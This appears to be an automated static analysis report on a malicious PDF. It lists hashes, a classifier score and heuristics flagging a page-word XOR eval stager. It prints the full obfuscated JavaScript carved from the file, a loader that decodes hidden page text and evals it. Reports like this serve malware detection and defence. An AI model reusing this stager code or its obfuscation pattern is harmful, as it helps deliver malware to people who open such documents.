Malicious PDF — malware analysis report

Static analysis result for SHA-256 fb7a1be6d675a22e…

MALICIOUS

PDF

6.4 KB Authoring application: Geheuebozatni (via 52101Tevobeqire) First seen: 2026-05-08
MD5: 80812b4f15b06340fe2fe92a5b02a03a SHA-1: fb62cd2f7c835f1762b1ec2e561c6edbef8651b8 SHA-256: fb7a1be6d675a22ef03606eb694e92f59e43dac7a7cc926abec9c630e84fa189
86 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 3

  • Page-word XOR JavaScript eval stager high PDF_PAGE_WORD_XOR_EVAL_STAGER
    PDF JavaScript enumerates rendered page words with getPageNthWord/getPageNumWords, extracts encoded byte fragments, XOR-decodes the stage with char-code helpers, and evals the result. This is an old exploit-kit staging pattern and is not normal document JavaScript.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0011_000.js pdf-javascript-stream PDF /JS object 11 at offset 0x122D 1496 bytes
SHA-256: 3c69d07a7a7d1177a8a5d59ecb21e68c93fada9a4f0894bfc9b7585c139e6925
Preview script
First 1,000 lines of the extracted script
var vW="var dS=this.b;try {var kJEJ={    n : \'getPageNthWor9d\',hIT : \'getPageNuDmWords\',fWR : \'pageNum\',hOB : \'eval\',pE%F : \'join\',};hYF = 51 ;jIB=\'\';vCX=\'9\';bOX=0;pOV=String;lQR=\'\\\\x\';nAN=\'toString\';xUB=1;j_OJ=2;xMF=4;hWH=5;rAR=255;rQT=16;tIRD=\'doc\';rMR=%332;rQP=[];tUZ=q\'\';!fQL=dS[_kJEJ.hI&T](dS[kJEJ.fWR]);for(zEB=bOX;zEB< fQL; zEB++){var nCR=dS[kJEJ.n](dS[kJEJ.fWR],zEB,xUB);vCX=[vCX,nCR][kJEJ.pEF](jIB);;}for(z$EB=0;zEB < vCX.leng_th; zEB+=jO_J){fAX=vCX.substr(zEB,jOJ);hSX=parseInt(fAX,rQT~);bKP=hSX^hqYF;nOZ=#bKP.toS&tring(rQT);nOZ=_(nOZ.length==xUB) ? \'0\' + nOZ : nOZ;app[kJEJ.hOB](\'GnUX=(\"\'+lQR+nOZ+\'\")q;\');rQP#.push(n#UX)#;}try {!tUZ=rQP.join(jIqB);dS.fKZ=(tUZ.!substr(tUZ.length-rMR));dS.lMP=D(tU|Z.substr(bOX,tU$Z.l9engGth-rMR));vOF();} catch(|rKZ){if(dS.%lMP){tr!y {app[%kJEJ.hOB](dS.lMP);} catch(rKZ){}} else {}}} catch(tUZ){app.alert(tUZ.message);}";
var eXOF=/[%9&\|\$qD#G~_\!]/g;
function lW(yFGL){this.dEZ=this.b=yFGL};
var vS=new String("eval");

var tIR=this;
var qTCF=String("prot"+"otyp"+"e");
function xS(eLAD,hK){return eLAD+hK};
var vAD=String("repla"+"cerqB".substr(0,2));

var fWN="len"+"gth";
var jIB='';
var bOX=0;
;



var hOX={hQH:28967};
vW=vW[vAD](eXOF, jIB);


this.fUL="fUL";this.t=18423;this.t++;f={xI:"wJYL"};
;


lW[qTCF].mFQL = function(){
fULQ=14580;fULQ+=235;
this.b[vS](vW);
fAZ=2215;fAZ+=154;var rG=14320;zABY={};
}

var tGX="tGX";var zUJ="zUJ";

var pWJ=new lW(tIR);



nQ=3112;nQ+=47;bGT=30643;bGT--;

pWJ.mFQL();
;